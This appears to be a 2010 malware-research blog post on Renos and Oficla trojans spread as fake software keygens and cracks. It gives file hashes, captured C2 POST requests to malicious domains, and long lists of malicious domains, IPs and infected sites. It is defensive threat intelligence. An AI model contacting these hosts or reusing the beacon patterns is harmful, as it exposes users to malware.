Tag Archives: renos trojan

Free download cracked software with surprise

We have logged another website used to capture keywords related to software and to spread Renos trojan and other dangerous threats as execuable files of software cracks and keygens. The website uses blackhat seo strategies to attract most users possibles and to appear in the first pages of search engines.

Cracked Software Website

The file that is downloaded from the dangerous website is:

Downloaded File

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that everytime we tried to download the infected file, it had always a different md5 checksum hash. This means that most probably the payload is created on-the-fly or there are various executable versions of the malware stored in the server, that are downloaded randomly. Is possible this is done to make sure the website distributes always an up-to-date malware executable, and so not detected by security software.

During the analysis, the following files have been created in our system:

Created Files

Suspicious DNS queries:

megadataonline .net .....
mydynatri .net .....
zoozus .com .....
threezio .com .....
sina.com .cn .....
waytoall .com .....
topdworld .com .....
thevehic .com .....
ad.tlvmedia .com .....

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware looks like to have posted, with the method “POST”, a lot of encrypted data to various website urls and at the end it received commands to visit some advertisement links.

Domaind & IP Analysis:

sotapartners.net174.123.211.138 – AS: 21844
data-mortgage.com78.46.76.170 – AS: 24940
megadataonline.net64.191.16.70 – AS: 21788
mydynatri.net77.78.248.84 – AS: 42560
zoozus.com85.234.190.47 – AS: 6851
threezio.com77.78.239.42 – AS: 42560
waytoall.com96.9.157.39 – AS: 21788
topdworld.com173.212.250.130 – AS: 21788
thevehic.com173.212.245.243 – AS: 21788
ad.tlvmedia.com217.163.21.37 – AS: 42173

Other suspicious domains hosted in 64.191.16.70:

brodiero.com64.191.16.70 – AS: 21788
megadatacentral.net64.191.16.70 – AS: 21788
megadataonline.net64.191.16.70 – AS: 21788
spiderfile.net87.255.51.229 – AS: 38930

Other suspicious domains hosted in 85.234.190.47:

chattertune.net85.234.190.47 – AS: 6851
mybubblebean.com – – – AS: NA
roonotimex.com85.234.190.47 – AS: 6851

Oficla Trojan spreads through keygens and software cracks

Here is a new list of dangerous domains logged by internal honeypots and submitted by users, used to spread trojans, rogue security software and other malicious threats, some domains have a low detection rate as of today:

Rogue Security Software:

www4.checkpc96.co.cc / 209.212.149.23
www4.checkpc97.co.cc / 209.212.149.23
www4.checkpc98.co.cc / 209.212.149.23
www4.checkpc95.co.cc / 209.212.149.23
www4.checkpc94.co.cc / 209.212.149.23
www4.checkpc93.co.cc / 209.212.149.23
www1.makeptotect79.co.cc / 94.228.220.117
www1.makeptotect78.co.cc / 94.228.220.117
www1.makeptotect77.co.cc / 94.228.220.117
www1.makeptotect76.co.cc / 94.228.220.117
www1.makeptotect75.co.cc / 94.228.220.117
www1.makeptotect74.co.cc / 74.3.166.117
www1.makeptotect73.co.cc / 74.3.166.117
www1.makeptotect72.co.cc / 74.3.166.117
www1.makeptotect71.co.cc / 74.3.166.117
www1.makeptotect70.co.cc / 74.3.166.117

Trojan Distribution (Oficla/Renos):

gourlz.net / 178.63.3.138
thestockfiles.com / 69.10.36.218
vo2ov.com / 95.211.10.178
cvaohn.org / 209.123.181.48
mechadairysystems.com / 208.87.240.230
longsoft.org / 64.21.53.43
kenborden.com / 209.123.181.48
hotworldmedia.com / 69.10.36.218

Infected Websites:

absfixer.com/catalog/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
demo.itlinkonline.com/tcartz2/images/news.php?page=keyword (200 OK)
meyal.com/images/news.php?page=keyword (200 OK)
delisuper.com/images/page.php?page=keyword (200 OK)
antoniasecrets.com/catalog/images/news.php?page=keyword (200 OK)
ap2.dataoz.com/catalog/images/page.php?page=keyword (200 OK)
shylittle.com/catalog/images/page.php?page=keyword (200 OK)
dtechsac.com/tienda/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
donegalanglingcentre.com/shop/images/page.php?page=keyword (200 OK)
gravure3d.fr/catalog/images/page.php?page=keyword (200 OK)
exerciseelite.com/images/news.php?page=keyword (200 OK)
econdbike.it/negozio/images/news.php?page=keyword (200 OK)
seobrand.net/private_label/images/news.php?page=keyword (200 OK)

The IP address 209.123.181.48 (AS8001 – NAC Net Access Corp) looks like to have hosted and to actually host a very high number of malicious domains that are mostly used to distribute trojans as keygen or cracks for popular commercial software:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
allmusic.com.ua
amorphia.com.ua
artsofboreal.com
botaime.com
c-charts.com
cflor.org
creaweblog.com
cvaohn.org
digitaldepotstore.net
dwrz.com.ua
gsis-bro.com
imvu.com.ua
ineverforget.com
job-hotel.com.ua
k-p.km.ua
kenborden.com
loweimages.com
mail.allmusic.com.ua
mail.amorphia.com.ua
mail.artsofboreal.com
mail.creaweblog.com
mail.cvaohn.org
mail.digitaldepotstore.net
mail.dwrz.com.ua
mail.gsis-bro.com
mail.imvu.com.ua
mail.ineverforget.com
mail.job-hotel.com.ua
mail.k-p.km.ua
mail.kenborden.com
mail.maple-shion.net
mail.newlife3o.com
mail.obama4.in.ua
mail.obogreva.net
mail.pekinform.com.ua
mail.pill-flag.com
mail.ranta-kone.com
mail.serce.com.ua
mail.setite.com
mail.snak.vn.ua
mail.techwave.com.ua
mail.toptvproduct.ru
mail.ukreunov.com.ua
mail.xocit.com
mail.yazv.net
nasharu.org
newenglandgroup.us
newlife3o.com
ns1.obama4.in.ua
ns1.snak.kiev.ua
obama4.in.ua
pekinform.com.ua
pill-flag.com
ranta-kone.com
serce.com.ua
snak.vn.ua
techwave.com.ua
toptvproduct.ru
ukreunov.com.ua
www.botaime.com
www.dwrz.com.ua
www.ineverforget.com
www.loweimages.com
www.nasharu.org
www.xwarezzz.com
xwarezzz.com
yazv.net

Whois details for 209.123.181.48:

NetRange: 209.123.0.0 – 209.123.255.255
CIDR: 209.123.0.0/16
OriginAS: AS8001
NetName: NAC-NETBLK02
NetHandle: NET-209-123-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.NAC.NET
NameServer: NS1.NAC.NET
Comment: Additional Information Available via whois.nac.net
RegDate: 1997-08-06
Updated: 2007-09-18
Ref: http://whois.arin.net/rest/net/NET-209-123-0-0-1

OrgName: Net Access Corporation
OrgId: NAC
Address: 9 Wing Drive
City: Cedar Knolls
StateProv: NJ
PostalCode: 07927
Country: US
RegDate:
Updated: 2008-01-16
Ref: http://whois.arin.net/rest/org/NAC

OrgAbuseHandle: ABUSE156-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-800-638-6336
OrgAbuseEmail: XXXXX@nac.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE156-ARIN

Also the IP address 64.21.53.43 (AS8001 – NAC Net Access Corp) looks like to host malicious domains, in particular longsoft.org that is used to distribute trojans by promising keygens and craks for software:

Trojan spreading in action:

Image

Report 2010-08-19 15:09:47 (GMT 1)
File Name paragon.exe
File Size 135168 bytes
File Type Executable File (EXE)
MD5 Hash f1d62efaea0986dd6b8ef1eee470e8dc
SHA1 Hash 90f59e41ad56204390f58f34c61c4aea04538a31
Detections: 3 / 16 ( 19 %)
Status INFECTED

Trojan Activity:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)		
 
POST /logos/XXX
Host: devtempest.com (91.188.60.233)
 
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /werber/34b520e6b47/217.gif HTTP/1.1
Host: mybubblebean.com (85.234.190.47)
 
POST /perce/XXX
Host: peribox.net (77.78.239.42)

64.21.53.43 (AS8001 – NAC Net Access Corp)

1
2
3
4
5
6
7
longsoft.org
mail.longsoft.org
mail.real-downloads.net
mail.thenewamsterdams.net
mail.web-zik.com
real-downloads.net
web-zik.com

69.10.36.218 (AS19318 – NJIIX.net 110B Meadowlands Pkwy Secaucus)

1
2
3
4
5
6
mediaidentifier.com
movieregion.com
multimedianame.com
ns1.prominentupstairs.com
realplayerpro.com
yourreload.com

178.63.3.138 (AS24940 – Hetzner Online AG RZ)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
gourlz.net
aevitasecuritystore.com
atzan.com
buydedicated.ru
buyvps.ru
ddiscompstore.com
de2.reserver.ru
erosik.com
fasturls.net
finmill.com
funnyseo.biz
hentaix.ru
humorarchive.info
jaguarconsultant.com
keygen-crack.net
kino2012.ru
kinovam.com
mail.all4-sex.info
marconmedia.com
ns1.buydedicated.ru
photo63.www.vk.com.www2in.net
serialpost.net
sey.su
softwareserialnumbers.net
soshinenie.ru
trusted-warez.com
vadoz.ru
www.erosik.com
www.photo63.www.vk.com.www2in.net
www.soshinenie.ru
www.xmancer.org
www2in.net
xmancer.org

208.87.240.230 (AS40676 – Proxy registration for downstream)

1
2
3
4
5
6
7
8
9
10
11
12
13
bigbizoo.net
grosskopf.net
grrrey.com
mail.konseed.org
mail.richfootball.net
ns1.richfootball.net
ns2.richfootball.net
pixelfish.net
richfootball.net
setite.com
theapps.org
www.setite.com
xocit.com

217.23.5.74 (AS49981 – WorldStream)

1
2
3
4
billgable.com
dlov.org
softwareshare.org
techrev.net

8.14.147.235 (AS26481 – BONDWEB Bondweb)

1
2
3
4
5
6
7
8
9
10
11
12
13
directdownloads.ws
loaded.ws
mail.directdownloads.ws
mail.loaded.ws
mail.skinnyrons.com
mail.unlimitedserials.com
skinnyrons.com
unlimitedserials.com
warez411.com
loaded.ws
unlimitedserials.com
warez411.com
unlimitedserials.com

69.55.50.102 (AS23393 – ISPRIME , Inc.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
kevin.internal.realitychecknetwork.com
mail.fulldownload.ws
rcn560.realitychecknetwork.com
sharingaccess.com
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
sharingaccess.com
sharingnova.com

We will stop here for now, but list is very long!